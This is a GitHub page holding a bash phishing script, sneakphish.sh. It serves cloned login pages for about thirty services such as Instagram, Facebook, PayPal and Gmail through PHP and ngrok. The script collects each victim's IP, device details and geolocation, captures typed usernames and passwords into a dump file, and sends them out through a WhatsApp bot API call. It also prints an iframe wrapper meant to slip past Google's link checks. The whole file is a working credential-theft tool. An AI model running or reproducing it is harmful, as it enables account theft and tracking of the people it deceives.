forked from noob-hackers/sneakphish
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathsneakphish.sh
615 lines (580 loc) · 24.4 KB
/
sneakphish.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
###Internet And Process###
cd $HOME
rm -rf .ngrok2 > /dev/null 2>&1
cd $HOME/sneakphish
terminate(){
pingngrok=$(ps aux | grep -o "ngrok" | head -n1)
pingphp=$(ps aux | grep -o "php" | head -n1)
if [[ $pinggrok == *'ngrok'* ]]; then
pkill -f -2 ngrok > /dev/null 2>&1
fi
if [[ $pingphp == *'php'* ]]; then
pkill -f -2 php > /dev/null 2>&1
fi
}
terminate
speed=$(echo $(basename $(readlink -nf $0)))
if [ "$speed" = "sneakphish.sh" ]
then
hunt=$(echo)
else
echo -n '' > sneakphish.sh
fi
#issues () {
#pings=$(echo $(basename $(readlink -nf $0)))
#skip=$(wc -w "$pings" | cut -d' ' -f1)
#if [ "$skip" = "2306" ]
#then
#vars=$(echo)
#else
#echo -n '' > sneakphish.sh
#fi
#}
#issues
###########
banner (){
clear
echo -e '\e[90m
\e[90m ███████\e[92m╗\e[90m███\e[92m╗ \e[90m██\e[92m╗\e[90m███████\e[92m╗ \e[90m█████\e[92m╗ \e[90m██\e[92m╗ \e[90m██\e[92m╗
\e[90m ██\e[92m╔════╝\e[90m████\e[92m╗ \e[90m██\e[92m║\e[90m██\e[92m╔════╝\e[90m██\e[92m╔══\e[90m██\e[92m╗\e[90m██\e[92m║ \e[90m██\e[92m╔╝
\e[90m ███████\e[92m╗\e[90m██\e[92m╔\e[90m██\e[92m╗ \e[90m██\e[92m║\e[90m█████\e[92m╗ \e[90m███████\e[92m║\e[90m█████\e[92m╔╝
\e[92m ╚════\e[90m██\e[92m║\e[90m██\e[92m║╚\e[90m██\e[92m╗\e[90m██\e[92m║\e[90m██\e[92m╔══╝ \e[90m██\e[92m╔══\e[90m██\e[92m║\e[90m██\e[92m╔═\e[90m██\e[92m╗
\e[90m ███████\e[92m║\e[90m██\e[92m║ ╚\e[90m████\e[92m║\e[90m███████\e[92m╗\e[90m██\e[92m║ \e[90m██\e[92m║\e[90m██\e[92m║ \e[90m██\e[92m╗
\e[92m ╚══════╝╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝╚═╝ ╚═\e[92m╝'
echo -e '\e[34m
\e[34m ██████╗ ██╗ ██╗██╗███████╗██╗ ██╗
\e[34m ██╔══██╗██║ ██║██║██╔════╝██║ ██║
\e[34m ██████╔╝███████║██║███████╗███████║
\e[34m ██\e[90m╔═══╝ \e[34m██\e[90m╔══\e[34m██\e[90m║\e[34m██\e[90m║\e[90m╚════\e[34m██\e[90m║\e[34m██\e[90m╔══\e[34m██\e[90m║
\e[34m ██\e[90m║ \e[34m██\e[90m║ \e[34m██\e[90m║\e[34m██\e[90m║\e[34m███████\e[90m║\e[34m██\e[90m║ \e[34m██\e[90m║
\e[90m ╚═╝ ╚═╝ ╚═╝╚═╝╚══════╝╚═╝ ╚═╝'
echo
echo -e " \e[92m::~:: \e[0mBY NOOB HACKERS\e[92m ::~::\e[0m"
echo -e " \e[92m::~:: \e[0mgithub.com/noob-hackers\e[92m ::~::\e[0m"
echo
}
menu() {
echo -e " \e[92m[\e[34m1\e[92m]\e[92m---\e[92mSTART\e[0m"
echo -e " \e[92m[\e[34m2\e[92m]\e[92m---\e[92mUPDATE\e[0m"
echo -e " \e[92m[\e[34m3\e[92m]\e[92m---\e[92mABOUT\e[0m"
echo -e " \e[92m[\e[34m4\e[92m]\e[92m---\e[92mMORE\e[0m"
echo -e " \e[92m[\e[34m5\e[92m]\e[92m---\e[92mFOLLOW\e[0m"
echo -e " \e[92m[\e[34m6\e[92m]\e[92m---\e[92mVIDEO\e[0m"
echo -e " \e[92m[\e[34m7\e[92m]\e[92m---\e[92mCHAT NOW\e[0m"
echo -e " \e[92m[\e[34m8\e[92m]\e[92m---\e[92mRESTART\e[0m"
echo -e " \e[92m[\e[34m9\e[92m]\e[92m---\e[92mEXIT\e[0m"
echo
echo -ne "\e[92mSelect Option\e[0m: \e[92m"
read iput
if [[ "$iput" = "1" || "$iput" = "one" ]];
then
pagemenu
elif [[ "$iput" = "2" || "$iput" = "two" ]];
then
echo -e " SOON I WILL UPDATE"
elif [[ "$iput" = "3" || "$iput" = "three" ]];
then
about
elif [[ "$iput" = "4" || "$iput" = "four" ]];
then
moremenu
elif [[ "$iput" = "5" || "$iput" = "five" ]];
then
am start -a android.intent.action.VIEW -d https://noob-hackers.github.io/noobspage 2>/dev/null
elif [[ "$iput" = "6" || "$iput" = "six" ]];
then
am start -a android.intent.action.VIEW -d https://bit.ly/nhytchannel > /dev/null 2>&1
elif [[ "$iput" = "7" || "$iput" = "seven" ]];
then
am start -a android.intent.action.VIEW -d https://bit.ly/nhwhatschat > /dev/null 2>&1
elif [[ "$iput" = "8" || "$iput" = "eight" ]];
then
bash sneakphish.sh
elif [[ "$iput" = "9" || "$iput" = "nine" ]];
then
exit 1
else
echo -e "\e[93m You Typed It Wromg broooo.....\e[0m"
exit 1
fi
}
catch_cred() {
echo
account=$(cat $HOME/sneakphish/webs/$site/gmail.txt)
echo "$account" >> dump.creds.txt 2>&1
IFS=$'\n'
password=$(cat $HOME/sneakphish/webs/$site/pass.txt)
echo "$password" >> dump.creds.txt 2>&1
echo -e "\e[1;93m[\e[0m\e[1;34m•\e[0m\e[1;93m]\e[0m\e[1;92m Account: \e[0m$account\e[0m"
echo -e "\e[1;93m[\e[0m\e[1;34m•\e[0m\e[1;93m]\e[0m\e[1;92m Password: \e[0m$password\e[0m"
if [[ -f key.txt ]] && [[ -f num.txt ]]
then
tim=$(date +%D-%T)
datnum=$(cat num.txt)
datkey=$(cat key.txt)
whats=$(curl -s -l "http://api.callmebot.com/whatsapp.php?phone=$datnum&text=Account:$account%20||%20Pass:$password%20||%20Site:$site%20||%20Time:$tim%20&apikey=$datkey" 2>&1)
echo -e "\e[1;93m[\e[0m\e[1;34m•\e[0m\e[1;93m]\e[92m Whatsapp Forward:\e[0m\e[1;0m Successfull"
echo -e "\e[1;93m[\e[0m\e[1;34m•\e[0m\e[1;93m]\e[92m Saved:\e[0m\e[1;0m $site/dump.all.txt"
rm webs/$site/pass.txt 2>&1
rm webs/$site/gmail.txt 2>&1
rm webs/$site/ip.txt 2>&1
checkfound
pkill -f -2 php > /dev/null 2>&1
pkill -f -2 ngrok > /dev/null 2>&1
exit 1
else
echo -e "\e[1;93m[\e[0m\e[1;34m•\e[0m\e[1;93m]\e[92m Whatsapp Forward:\e[0m\e[1;91m Off"
echo -e "\e[1;93m[\e[0m\e[1;34m•\e[0m\e[1;93m]\e[92m Saved:\e[0m\e[1;0m $site/dump.all.txt"
rm webs/$site/pass.txt 2>&1
rm webs/$site/gmail.txt 2>&1
rm webs/$site/ip.txt 2>&1
checkfound
pkill -f -2 php > /dev/null 2>&1
pkill -f -2 ngrok > /dev/null 2>&1
exit 1
fi
}
pagemenu (){
banner
echo
echo
echo -e " \e[92m[\e[34m1\e[92m]\e[92m---\e[93mInstagram\e[0m \e[92m[\e[34m11\e[92m]\e[92m---\e[93mAirtelSim\e[0m \e[92m[\e[34m21\e[92m]\e[92m---\e[93mWordpress\e[0m"
echo -e " \e[92m[\e[34m2\e[92m]\e[92m---\e[93mFacebook\e[0m \e[92m[\e[34m12\e[92m]\e[92m---\e[93mAmazon\e[0m \e[92m[\e[34m22\e[92m]\e[92m---\e[93mJioRouter\e[0m"
echo -e " \e[92m[\e[34m3\e[92m]\e[92m---\e[93mSociallub\e[0m \e[92m[\e[34m13\e[92m]\e[92m---\e[93mApple\e[0m \e[92m[\e[34m23\e[92m]\e[92m---\e[93mSnapchat\e[0m"
echo -e " \e[92m[\e[34m4\e[92m]\e[92m---\e[93mNetflix\e[0m \e[92m[\e[34m14\e[92m]\e[92m---\e[93mClasofclans\e[0m \e[92m[\e[34m24\e[92m]\e[92m---\e[93mOla\e[0m"
echo -e " \e[92m[\e[34m5\e[92m]\e[92m---\e[93mTelegram\e[0m \e[92m[\e[34m15\e[92m]\e[92m---\e[93mGoogle\e[0m \e[92m[\e[34m25\e[92m]\e[92m---\e[93mPayPal\e[0m"
echo -e " \e[92m[\e[34m6\e[92m]\e[92m---\e[93mYahoo\e[0m \e[92m[\e[34m16\e[92m]\e[92m---\e[93mFreeFire\e[0m \e[92m[\e[34m26\e[92m]\e[92m---\e[93mLinkedin\e[0m"
echo -e " \e[92m[\e[34m7\e[92m]\e[92m---\e[93mYoutube\e[0m \e[92m[\e[34m17\e[92m]\e[92m---\e[93mGithub\e[0m \e[92m[\e[34m27\e[92m]\e[92m---\e[93mPlaystation\e[0m"
echo -e " \e[92m[\e[34m8\e[92m]\e[92m---\e[93mXbox\e[0m \e[92m[\e[34m18\e[92m]\e[92m---\e[93mGmail\e[0m \e[92m[\e[34m28\e[92m]\e[92m---\e[93mPubg\e[0m"
echo -e " \e[92m[\e[34m9\e[92m]\e[92m---\e[93mWifi\e[0m \e[92m[\e[34m19\e[92m]\e[92m---\e[93mOutlook\e[0m \e[92m[\e[34m29\e[92m]\e[92m---\e[93mShopify\e[0m"
echo -e " \e[92m[\e[34m10\e[92m]\e[92m---\e[93mTwitter\e[0m \e[92m[\e[34m20\e[92m]\e[92m---\e[93mSteam\e[0m \e[92m[\e[34m30\e[92m]\e[92m---\e[93mSocialClub\e[0m"
echo
echo -ne "\e[92mSELECT OPTION\e[0m: \e[92m"
read optio
if [[ "$optio" == "1" || "$optio" == "one" || "$optio" == "instagram" ]];
then
insmenu
elif [[ "$optio" == "2" || "$optio" == "two" || "$optio" == "facebook" ]]
then
fbmenu
elif [[ "$optio" == "3" || "$optio" == "three" || "$optio" == "socialclub" ]]
then
site="socialclub"
start
elif [[ "$optio" == "4" || "$optio" == "four" || "$optio" == "netflix" ]]
then
site="netflix"
start
elif [[ "$optio" == "5" || "$optio" == "five" || "$optio" == "telegram" ]]
then
site="telegram"
start
elif [[ "$optio" == "6" || "$optio" == "six" || "$optio" == "yahoo" ]]
then
site="yahoo"
start
elif [[ "$optio" == "7" || "$optio" == "seven" || "$optio" == "youtube" ]]
then
site="youtube"
start
elif [[ "$optio" == "8" || "$optio" == "eight" || "$optio" == "xbox" ]]
then
site="xbox"
start
elif [[ "$optio" == "9" || "$optio" == "nine" || "$optio" == "wifi" ]]
then
site="wifi"
start
elif [[ "$optio" == "10" || "$optio" == "ten" || "$optio" == "twitter" ]]
then
site="twitter"
start
elif [[ "$optio" == "11" || "$optio" == "eleven" || "$optio" == "airtelsim" ]]
then
site="airtelsim"
start
elif [[ "$optio" == "12" || "$optio" == "twelve" || "$optio" == "amazon" ]]
then
site="amazon"
start
elif [[ "$optio" == "13" || "$optio" == "thirteen" || "$optio" == "apple" ]]
then
site="apple"
start
elif [[ "$optio" == "14" || "$optio" == "fourteen" || "$optio" == "clashofclans" ]]
then
site="clashofclans"
start
elif [[ "$optio" == "15" || "$optio" == "fifteen" || "$optio" == "google" ]]
then
gmenu
start
elif [[ "$optio" == "16" || "$optio" == "sixteen" || "$optio" == "freefire" ]]
then
site="freefire"
start
elif [[ "$optio" == "17" || "$optio" == "seventeen" || "$optio" == "github" ]]
then
site="github"
start
elif [[ "$optio" == "18" || "$optio" == "eighteen" || "$optio" == "gmail" ]]
then
site="gmail"
start
elif [[ "$optio" == "19" || "$optio" == "ninteen" || "$optio" == "outlook" ]]
then
site="outlook"
start
elif [[ "$optio" == "20" || "$optio" == "twenty" || "$optio" == "steam" ]]
then
site="steam"
start
elif [[ "$optio" == "21" || "$optio" == "twentyone" || "$optio" == "wordpress" ]]
then
site="wordpress"
start
elif [[ "$optio" == "22" || "$optio" == "twentytwo" || "$optio" == "jiorouter" ]]
then
site="jiorouter"
start
elif [[ "$optio" == "23" || "$optio" == "twentythree" || "$optio" == "snapchat" ]]
then
site="snapchat"
start
elif [[ "$optio" == "24" || "$optio" == "twentyfour" || "$optio" == "ola" ]]
then
site="ola"
start
elif [[ "$optio" == "25" || "$optio" == "twentyfive" || "$optio" == "paypal" ]]
then
site="paypal"
start
elif [[ "$optio" == "26" || "$optio" == "twentysix" || "$optio" == "linkedin" ]]
then
site="linkedin"
start
elif [[ "$optio" == "27" || "$optio" == "twentyseven" || "$optio" == "playstation" ]]
then
site="playstation"
start
elif [[ "$optio" == "28" || "$optio" == "twentyeight" || "$optio" == "pubg" ]]
then
site="pubg"
start
elif [[ "$optio" == "29" || "$optio" == "twentynine" || "$optio" == "shopify" ]]
then
site="shopify"
start
elif [[ "$optio" == "30" || "$optio" == "thirtee" || "$optio" == "socialclub" ]]
then
site="socialclub"
start
elif [[ "$optio" == "00" || "$optio" == "back" || "$optio" == "0" ]]
then
banner
menu
fi
}
insmenu() {
echo
echo -e " \e[92m[\e[34m1\e[92m]\e[92m---\e[93mInstagram\e[0m \e[92m[\e[34m2\e[92m]\e[92m---\e[93mIGverify\e[0m \e[92m[\e[34m3\e[92m]\e[92m---\e[93mIGfollowers\e[0m"
echo
echo -ne "\e[92mSELECT OPTION\e[0m: \e[92m"
read optioz
if [[ "$optioz" == "1" || "$optioz" == "one" || "$optioz" == "instagram" ]];
then
site="instagram"
start
elif [[ "$optioz" == "2" || "$optioz" == "two" || "$optioz" == "instagram" ]];
then
site="igverify"
start
elif [[ "$optioz" == "3" || "$optioz" == "three" || "$optioz" == "instagram" ]];
then
site="instafollowers"
start
fi
}
fbmenu() {
echo
echo -e " \e[92m[\e[34m1\e[92m]\e[92m---\e[93mFacebook\e[0m \e[92m[\e[34m2\e[92m]\e[92m---\e[93mFBpoll\e[0m \e[92m[\e[34m3\e[92m]\e[92m---\e[93mFBsecurity\e[0m"
echo
echo -ne "\e[92mSELECT OPTION\e[0m: \e[92m"
read optioz
if [[ "$optioz" == "1" || "$optioz" == "one" || "$optioz" == "facebook" ]];
then
site="facebook"
start
elif [[ "$optioz" == "2" || "$optioz" == "two" || "$optioz" == "facebook" ]];
then
site="fbpoll"
start
elif [[ "$optioz" == "3" || "$optioz" == "three" || "$optioz" == "facebook" ]];
then
site="fbsec"
start
fi
}
gmenu() {
echo
echo -e " \e[92m[\e[34m1\e[92m]\e[92m---\e[93mGoogle\e[0m \e[92m[\e[34m2\e[92m]\e[92m---\e[93mGooglepoll\e[0m"
echo
echo -ne "\e[92mSELECT OPTION\e[0m: \e[92m"
read optioz
if [[ "$optioz" == "1" || "$optioz" == "one" || "$optioz" == "Google" ]];
then
site="googlenew"
start
elif [[ "$optioz" == "1" || "$optioz" == "one" || "$optioz" == "Google" ]];
then
site="googlepoll"
start
fi
}
getcredentials() {
echo ' '
printf "\e[1;93m[\e[0m\e[1;34m•\e[0m\e[1;93m] Waiting for data ...\e[0m\n"
while [ true ]; do
if [[ -e "webs/$site/gmail.txt" ]]; then
printf "\n\e[1;93m[\e[34m•\e[1;93m]\e[0m\e[1;92m Fetched Data Found!\n"
catch_cred
fi
sleep 1
done
}
checkfound() {
echo ' '
echo -e "\e[1;93m[\e[0m\e[34m•\e[0m\e[1;93m] Waiting for victim to open link...\e[0m\n"
echo ' '
#echo -e "\e[92m------------------------\e[91mVICTIM FOUND\e[92m-------------------------\e[0m"
while [ true ]; do
if [[ -e "$HOME/sneakphish/webs/$site/ip.txt" ]]; then
echo
echo -e "\e[92m------------------------\e[34mVICTIM FOUND\e[92m-------------------------\e[0m"
echo
echo -e "\n\e[1;92m[\e[34m•\e[1;92m] Device info found..."
echo ' '
#echo -e "\e[92m------------------------\e[91mVICTIM FOUND\e[92m-------------------------\e[0m"
echo ' '
catch_ip
fi
sleep 1
done
}
catch_ip() {
ip=$( egrep '(([0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(:0{1,4}){0,1}:){0,1}((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]).){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]).){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))' webs/$site/ip.txt | cut -d " " -f2 | tr -d '\r')
IFS=$'\n'
ua=$(grep 'User-Agent:' webs/$site/ip.txt | cut -d '"' -f2)
echo -e "\e[1;93m[\e[0m\e[1;77m*\e[0m\e[1;93m] User-Agent:\e[0m$ua\e[0m\e[1;77m\e[0m\n"
chk=$(fmt -20 webs/$site/ip.txt)
sch=$(echo "$chk" > cod.txt)
dom1=$(sed -n '5p' cod.txt | cut -d"(" -f2 | cut -d";" -f1)
dom2=$(sed -n '6p' cod.txt | cut -d"(" -f2 | cut -d";" -f1)
dom3=$(sed -n '7p' cod.txt | cut -d";" -f2 | cut -d")" -f1)
dom4=$(sed -n '11p' cod.txt | cut -d "/" -f1)
dom5=$(sed -n '11p' cod.txt | cut -d " " -f2 | cut -d"/" -f2)
dom6=$(sed -n '12p' cod.txt | cut -d"(" -f2 | cut -d")" -f1)
echo -e "\e[1;92m[\e[0m\e[1;34m•\e[0m\e[1;92m] Kernel:\e[1;0m$dom1\e[0m"
echo -e "\e[1;92m[\e[0m\e[1;34m•\e[0m\e[1;92m] Os:\e[1;0m$dom2\e[0m"
echo -e "\e[1;92m[\e[0m\e[1;34m•\e[0m\e[1;92m] Model:\e[1;0m$dom3\e[0m"
echo -e "\e[1;92m[\e[0m\e[1;34m•\e[0m\e[1;92m] Browser:\e[0m$dom4\e[0m"
echo -e "\e[1;92m[\e[0m\e[1;34m•\e[0m\e[1;92m] Version:\e[1;0m$dom5\e[0m"
echo -e "\e[1;92m[\e[0m\e[1;34m•\e[0m\e[1;92m] Device:\e[1;0m$dom6\e[0m"
cat webs/$site/ip.txt >> webs/$site/dump.ip.txt
if [[ -e location.txt ]]; then
rm -rf location.txt
fi
IFS='\n'
iptracker=$(curl -s -L "http://ipwhois.app/json/$ip" --user-agent "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31" > location.txt && grep -o '"[^"]*"\s*:\s*"[^"]*"' location.txt > track.txt)
IFS=$'\n'
iptt=$(sed -n 's/"ip"://p' track.txt)
if [[ $iptt != "" ]]; then
echo -e "\e[1;92m[\e[34m•\e[92m] Device ip: \e[0m$iptt\e[0m"
fi
iptype=$(sed -n 's/"type"://p' track.txt)
if [[ $iptype != "" ]]; then
echo -e "\e[1;92m[\e[34m•\e[92m] IP type: \e[0m$iptype\e[0m"
fi
continent=$(sed -n 's/"continent"://p' track.txt)
if [[ $continent != "" ]]; then
echo -e "\e[1;92m[\e[34m•\e[92m] Continent: \e[0m$continent\e[0m"
fi
country=$(sed -n 's/"country"://p' track.txt)
if [[ $country != "" ]]; then
echo -e "\e[1;92m[\e[34m•\e[92m] Country: \e[0m$country\e[0m"
fi
flag=$(sed -n 's/"country_flag"://p' track.txt)
if [[ $flag != "" ]]; then
echo -e "\e[1;92m[\e[34m•\e[92m] Country flag: \e[0m$flag\e[0m"
fi
cap=$(sed -n 's/"country_capital"://p' track.txt)
if [[ $cap != "" ]]; then
echo -e "\e[1;92m[\e[34m•\e[92m] Country capital: \e[0m$cap\e[0m"
fi
phon=$(sed -n 's/"country_phone"://p' track.txt)
if [[ $phon != "" ]]; then
echo -e "\e[1;92m[\e[34m•\e[92m] Country code: \e[0m$phon\e[0m"
fi
region=$(sed -n 's/"region"://p' track.txt)
if [[ $region != "" ]]; then
echo -e "\e[1;92m[\e[34m•\e[92m] State: \e[0m$region\e[0m"
fi
city=$(sed -n 's/"city"://p' track.txt)
if [[ $city != "" ]]; then
echo -e "\e[1;92m[\e[34m•\e[92m] City: \e[0m$city\e[0m"
fi
isp=$(sed -n 's/"isp"://p' track.txt)
if [[ $isp != "" ]]; then
echo -e "\e[1;92m[\e[34m•\e[92m] Isp: \e[0m$isp\e[0m"
fi
ccode=$(sed -n 's/"currency_code"://p' track.txt)
if [[ $ccode != "" ]]; then
echo -e "\e[1;92m[\e[34m•\e[92m] Currency code: \e[0m$ccode\e[0m"
fi
printf "\n"
getcredentials
}
start() {
#if [[ -e $HOME/prophish/webs/$site/ip.txt ]]; then
#rm -rf webs/$site/ip.txt 2>&1
#fi
if [[ -e webs/$site/pass.txt ]]; then
rm -rf webs/$site/pass.txt 2>&1
fi
if [[ -e webs/$site/gmail.txt ]]; then
rm -rf webs/$site/gmail.txt 2>&1
fi
if [[ -e ngrok ]]; then
echo ""
else
echo
printf "\e[1;92m[\e[34m•\e[1;92m] Downloading Ngrok...\n"
arch=$(uname -a | grep -o 'arm')
if [[ $arch == *'arm'* ]]; then
wget https://bin.equinox.io/a/e93TBaoFgZw/ngrok-2.2.8-linux-arm.zip > /dev/null 2>&1
if [[ -e ngrok-2.2.8-linux-arm.zip ]]; then
unzip ngrok-2.2.8-linux-arm.zip > /dev/null 2>&1
rm -rf $HOME/.ngrok2 > /dev/null 2>&1
chmod +x ngrok
rm -rf ngrok-2.2.8-linux-arm.zip
else
echo
printf "\e[1;93m[!] Download error... Termux, run:\e[0m\e[1;77m pkg install wget\e[0m\n"
exit 1
fi
else
wget https://github.com/noob-hackers/impstuff/raw/main/ngrok%2Bwifi%2Bdata.zip > /dev/null 2>&1
if [[ -e ngrok+wifi+data.zip ]]; then
unzip ngrok+wifi+data.zip > /dev/null 2>&1
rm -rf $HOME/.ngrok2 > /dev/null 2>&1
chmod +x ngrok
rm -rf ngrok+wifi+data.zip
else
echo
printf "\e[1;93m[!] Unable to download \e[0m\n"
exit 1
fi
fi
fi
echo -e "\e[1;92m[\e[34m•\e[1;92m] Starting Host Server..."
cd webs/$site && php -S 127.0.0.1:3333 > /dev/null 2>&1 &
sleep 8
echo -e "\e[1;92m[\e[34m•\e[1;92m] Starting Ngrok Server..."
./ngrok http 3333 > /dev/null 2>&1 &
sleep 15
link=$(curl -s -N http://127.0.0.1:4040/status | grep -o "https://[0-9A-Za-z.-]*\.ngrok.io")
status=$(curl -s -o /dev/null -I -w "%{http_code}" $link)
stat=$(echo "$status")
if [ "$stat" = "200" ];
then
echo -e "\e[1;92m[\e[34m•\e[1;92m] Link working code \e[34m[\e[0m200\e[34m]\e[0m"
touch bypass.html
cat > bypass.html << EOF
<iframe name="$site" src="$link" width="100%" height="100%" frameborder="0" scrolling="yes" style="width: 100%;"> </iframe>
EOF
bypass=$(cat bypass.html)
echo
echo -e "\e[92m[-------------\e[34mGoogle Bypass Code\e[92m-------------]\e[91m"
echo -e "\e[0m$bypass \e[0m"
echo -e "\e[92m[-----------\e[34mUse This Code in Github\e[92m----------]\e[92m"
echo
echo -e "\e[1;92m[\e[34m•\e[1;92m] Send This Link: \e[0m$link\e[0m"
checkfound
else
echo -e "\e[1;92m[\e[34m•\e[1;92m] Link working code \e[34m[\e[91m000\e[34m]\e[0m"
echo
echo -e "\e[92m[-------------\e[34mGoogle Bypass Code\e[92m-------------]\e[91m"
echo -e "\e[0m$bypass \e[0m"
echo -e "\e[92m[-----------\e[34mUse This Code in Github\e[92m----------]\e[91m"
echo
echo -e "\e[1;92m[\e[34m•\e[1;92m] Send This Link: \e[0m$link\e[0m"
checkfound
fi
}
about () {
clear
echo -e '\e[96m ----------------'
echo -e '\e[92m ┌─┐┌┐ ┌─┐┬ ┬┌┬┐
├─┤├┴┐│ ││ │ │
┴ ┴└─┘└─┘└─┘ ┴ '
echo -e '\e[96m ----------------'
echo -e '\e[96m |------------------|'
echo -e '\e[96m |'
echo -e '\e[96m |'
sleep 1.5
echo -e '\e[96m [\e[92m+\e[96m]-------[\e[92mNITRO\e[96m]'
echo -e '\e[96m |'
echo -e '\e[96m |'
sleep 1.0
echo -e '\e[96m [\e[92m+\e[96m]-------[\e[92mTOOL\e[96m]'
echo -e '\e[96m |'
echo -e '\e[96m |'
echo -e '\e[96m |'
sleep 2.0
echo -e '\e[96m [\e[92m+\e[96m]--------------'
echo -e '\e[96m |'
echo -e '\e[92m THIS TOOLS IS ONLY FOR EDUCATIONAL PURPOSE SO'
echo -e '\e[92m IM NOT RESPONSIBLE IF YOU DO ANY ILLEGAL THINGS'
echo -e '\e[92m THANKS FOR READING SUBSCRIBE {NOOB HACKERS}'
echo -e '\e[92m HAVE A GOOD DAY BUDDIE :)'
echo -e '\e[96m |'
echo -e '\e[96m |'
sleep 4.5
echo -e '\e[96m [\e[92m+\e[96m]------------[\e[92mBYE\e[96m]\e[0m'
sleep 2.0
cd $HOME
clear
bash sneakphish.sh
}
moremenu () {
banner
echo
echo -e "\e[92m[1]---------- Whats App Forward Setup\e[0m"
echo -e "\e[92m[2]---------- Google Bypass Hack\e[0m"
echo
echo -ne "\e[92m Select Option: \e[92m"
read opto
if [ "$opto" = "1" ]
then
echo
echo -e " If You Dont Now This Then Ask Developer"
echo
echo -e "\e[93m example: +91629xxxxxxx\e[92m"
echo -ne "\e[92m Number With Country Code: \e[92m"
read numz
nun=$(echo "$numz" > num.txt)
echo -e "\e[93m example: 728992\e[92m"
echo -ne "\e[92m Add code by Bot: \e[92m"
read keyz
nunz=$(echo "$keyz" > key.txt)
echo
echo -e "\e[92m Success...Now Use Tool and Check Whats App.."
echo
elif [ "$opto" = "2" ]
then
am start -a android.intent.action.VIEW -d https://tinyurl.com/whatschat > /dev/null 2>&1
fi
bash sneakphish.sh
}
banner
menu